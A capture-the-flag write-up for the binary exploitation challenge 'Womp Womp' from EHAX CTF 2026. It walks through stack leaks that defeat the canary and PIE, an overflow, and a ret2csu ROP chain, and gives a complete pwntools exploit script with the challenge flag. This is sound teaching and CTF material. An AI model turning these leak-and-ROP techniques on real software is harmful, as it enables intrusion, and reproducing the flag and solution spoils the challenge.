EHAX CTF 2026 - Womp Womp - Binary Exploitation Writeup

Category: Binary Exploitation

Flag: EH4X{r0pp3d_th3_w0mp3d}

Challenge Description#

Hippity hoppity the flag is not your property

Analysis#

I started by unpacking the handout and immediately got the important clue: this was a two-binary setup (challenge + libcoreio.so), which usually means the main binary has the bug and the shared object hides the win path.

1
unzip -l "handout_womp_womp.zip"

1
Archive:  handout_womp_womp.zip
2
  Length      Date    Time    Name
3
---------  ---------- -----   ----
4
        0  02-28-2026 00:42   handout/
5
    13016  02-28-2026 00:42   handout/challenge
6
     8416  02-28-2026 00:42   handout/libcoreio.so

Quick triage showed exactly the kind of target that rewards leak-first exploitation: PIE, canary, NX, full RELRO, and a not-stripped ELF. Not stripped mattered a lot here because function names like submit_note, review_note, and finalize_entry made the intended flow obvious right away.

1
file "handout/challenge" "handout/libcoreio.so"

1
handout/challenge:    ELF 64-bit LSB pie executable, x86-64, ... not stripped
2
handout/libcoreio.so: ELF 64-bit LSB shared object, x86-64, ... not stripped

1
checksec "handout/challenge"

1
[*] '/home/LIGHT/Downloads/handout/challenge'
2
    Arch:       amd64-64-little
3
    RELRO:      Full RELRO
4
    Stack:      Canary found
5
    NX:         NX enabled
6
    PIE:        PIE enabled
7
    RPATH:      b'.'
8
    Stripped:   No

Disassembling challenge made the full exploit shape click. submit_note reads 0x40 bytes into a stack buffer and then writes 0x58 bytes back, which leaks past the buffer into stack metadata. review_note does the same pattern with 0x20 read and 0x30 write, and that leak includes the stack-stored function pointer to finalize_note, which gives a PIE leak. Then finalize_entry performs the real overflow by reading 0x190 bytes into rbp-0x48.

1
objdump -d -M intel "handout/challenge"

1
00000000000009b7 <submit_note>:
2
 ...
3
 9f5: e8 26 fe ff ff        call   820 <read@plt>      ; read(..., 0x40)
4
 ...
5
 a21: e8 ea fd ff ff        call   810 <write@plt>     ; write(..., 0x58)
6

7
0000000000000a53 <review_note>:
8
 ...
9
 a9c: e8 7f fd ff ff        call   820 <read@plt>      ; read(..., 0x20)
10
 ...
11
 ac8: e8 43 fd ff ff        call   810 <write@plt>     ; write(..., 0x30)
12

13
0000000000000afa <finalize_entry>:
14
 ...
15
 b33: 48 83 c0 08           add    rax,0x8             ; target is rbp-0x48
16
 b37: ba 90 01 00 00        mov    edx,0x190
17
 b44: e8 d7 fc ff ff        call   820 <read@plt>

The shared object confirmed the end goal: emit_report checks three exact magic arguments and, if they match, opens and prints flag.txt. So the exploit only needed to call emit_report with controlled rdi/rsi/rdx.

1
objdump -d -M intel "handout/libcoreio.so"

1
00000000000007c0 <emit_report>:
2
 ...
3
 7ef: 48 b8 ef be ad de ef be ad de  movabs rax,0xdeadbeefdeadbeef
4
 7f9: 48 39 85 d8 fe ff ff            cmp QWORD PTR [rbp-0x128],rax
5
 ...
6
 802: 48 b8 be ba fe ca be ba fe ca  movabs rax,0xcafebabecafebabe
7
 ...
8
 815: 48 b8 0d f0 0d d0 0d f0 0d d0  movabs rax,0xd00df00dd00df00d
9
 ...
10
 87b: 48 8d 3d ee 00 00 00            lea rdi,[rip+0xee]  # "flag.txt"
11
 ...
12
 924: 48 89 c6                         mov rsi,rax
13
 927: bf 01 00 00 00                   mov edi,0x1
14
 92c: e8 3f fd ff ff                   call 670 <write@plt>

The only annoyance was gadget quality: there was pop rdi and pop rsi, but no clean pop rdx. I initially wished for a straightforward 3-pop chain, then realized this binary already contained the classic __libc_csu_init sequence, which is perfect for setting rdx via r13.

cry

1
ROPgadget --binary "handout/challenge" --only "pop|ret"

1
0x0000000000000ca3 : pop rdi ; ret
2
0x0000000000000ca1 : pop rsi ; pop r15 ; ret
3
...
4
Unique gadgets found: 12

1
objdump -d -M intel --start-address=0xc70 --stop-address=0xcb0 "handout/challenge"

1
0000000000000c80 <__libc_csu_init+0x40>:
2
 c80: 4c 89 ea              mov    rdx,r13
3
 c83: 4c 89 f6              mov    rsi,r14
4
 c86: 44 89 ff              mov    edi,r15d
5
 c89: 41 ff 14 dc           call   QWORD PTR [r12+rbx*8]
6
 ...
7
 c9a: 5b                    pop    rbx
8
 c9b: 5d                    pop    rbp
9
 c9c: 41 5c                 pop    r12
10
 c9e: 41 5d                 pop    r13
11
 ca0: 41 5e                 pop    r14
12
 ca2: 41 5f                 pop    r15
13
 ca4: c3                    ret

That made the final chain clean and reliable: leak canary from submit_note, leak PIE from review_note (finalize_note pointer minus 0x980), overflow in finalize_entry, use CSU call #1 to invoke read(0, .data, 8) and place a callable function pointer in writable memory (finalize_note), then CSU call #2 through that pointer with rsi/rdx set to the emit_report magic values, and finish with pop rdi ; ret to set rdi = 0xdeadbeefdeadbeef before jumping to emit_report@plt.

When the remote service printed [VULN] Done. and immediately followed with the flag, that confirmed both the offset math and the CSU argument setup were correct on first full remote run.

dance

1
from pwn import *
2

3
context.arch = "amd64"
4
io = remote("chall.ehax.in", 1337)
5

6
io.recvuntil(b"Input log entry: ")
7
io.send(b"A" * 0x40)
8
io.recvuntil(b"[LOG] Entry received: ")
9
leak1 = io.recvn(0x58)
10
canary = u64(leak1[0x48:0x50])
11

12
io.recvuntil(b"Input processing note: ")
13
io.send(b"B" * 0x20)
14
io.recvuntil(b"[PROC] Processing: ")
15
leak2 = io.recvn(0x30)
16
finalize_note = u64(leak2[0x20:0x28])
17
base = finalize_note - 0x980
18

19
csu_call = base + 0xC80
20
csu_pop = base + 0xC9A
21
pop_rdi = base + 0xCA3
22
emit_plt = base + 0x838
23
got_read = base + 0x201FC0
24
ptr_tbl = base + 0x202000
25

26
MAG1 = 0xDEADBEEFDEADBEEF
27
MAG2 = 0xCAFEBABECAFEBABE
28
MAG3 = 0xD00DF00DD00DF00D
29

30
def csu(funcptr, rdi, rsi, rdx, nxt):
31
    return (
32
        p64(csu_pop)
33
        + p64(0) + p64(1) + p64(funcptr)
34
        + p64(rdx) + p64(rsi) + p64(rdi)
35
        + p64(csu_call) + p64(0) + p64(0) * 6 + p64(nxt)
36
    )
37

38
chain = csu(got_read, 0, ptr_tbl, 8, csu_pop)
39
chain += p64(0) + p64(1) + p64(ptr_tbl) + p64(MAG3) + p64(MAG2) + p64(0)
40
chain += p64(csu_call) + p64(0) + p64(0) * 6
41
chain += p64(pop_rdi) + p64(MAG1) + p64(emit_plt)
42

43
payload = b"C" * 0x40 + p64(canary) + b"D" * 8 + chain
44

45
io.recvuntil(b"Send final payload: ")
46
io.send(payload)
47
io.send(p64(finalize_note))
48

49
print(io.recvall(timeout=5).decode("latin-1", "ignore"))

1
[VULN] Done.
2
EH4X{r0pp3d_th3_w0mp3d}

Solution#

1
from pwn import *
2

3
context.arch = "amd64"
4

5
HOST = "chall.ehax.in"
6
PORT = 1337
7

8
MAG1 = 0xDEADBEEFDEADBEEF
9
MAG2 = 0xCAFEBABECAFEBABE
10
MAG3 = 0xD00DF00DD00DF00D
11

12
io = remote(HOST, PORT)
13

14
# Stage 1: leak canary from submit_note
15
io.recvuntil(b"Input log entry: ")
16
io.send(b"A" * 0x40)
17
io.recvuntil(b"[LOG] Entry received: ")
18
leak1 = io.recvn(0x58)
19
canary = u64(leak1[0x48:0x50])
20

21
# Stage 2: leak PIE from review_note
22
io.recvuntil(b"Input processing note: ")
23
io.send(b"B" * 0x20)
24
io.recvuntil(b"[PROC] Processing: ")
25
leak2 = io.recvn(0x30)
26
finalize_note = u64(leak2[0x20:0x28])
27
pie = finalize_note - 0x980
28

29
csu_call = pie + 0xC80
30
csu_pop = pie + 0xC9A
31
pop_rdi = pie + 0xCA3
32
emit_plt = pie + 0x838
33
got_read = pie + 0x201FC0
34
ptr_tbl = pie + 0x202000
35

36
def csu(funcptr, rdi, rsi, rdx, nxt):
37
    chain = p64(csu_pop)
38
    chain += p64(0)          # rbx
39
    chain += p64(1)          # rbp
40
    chain += p64(funcptr)    # r12
41
    chain += p64(rdx)        # r13 -> rdx
42
    chain += p64(rsi)        # r14 -> rsi
43
    chain += p64(rdi)        # r15 -> edi
44
    chain += p64(csu_call)
45
    chain += p64(0)          # add rsp, 8
46
    chain += p64(0) * 6      # popped by csu epilogue
47
    chain += p64(nxt)
48
    return chain
49

50
# First CSU call: read(0, ptr_tbl, 8) to place a function pointer in writable memory
51
chain = csu(got_read, 0, ptr_tbl, 8, csu_pop)
52

53
# Second CSU call: call [ptr_tbl] (finalize_note), load MAGIC2/MAGIC3 into rsi/rdx
54
chain += p64(0) + p64(1) + p64(ptr_tbl) + p64(MAG3) + p64(MAG2) + p64(0)
55
chain += p64(csu_call)
56
chain += p64(0) + p64(0) * 6
57

58
# Set rdi and jump to emit_report@plt
59
chain += p64(pop_rdi)
60
chain += p64(MAG1)
61
chain += p64(emit_plt)
62

63
payload = b"C" * 0x40 + p64(canary) + b"D" * 8 + chain
64

65
io.recvuntil(b"Send final payload: ")
66
io.send(payload)
67

68
# Satisfy read(0, ptr_tbl, 8)
69
io.send(p64(finalize_note))
70

71
print(io.recvall(timeout=5).decode("latin-1", errors="ignore"))

1
python3.12 solve.py

1
[VULN] Done.
2
EH4X{r0pp3d_th3_w0mp3d}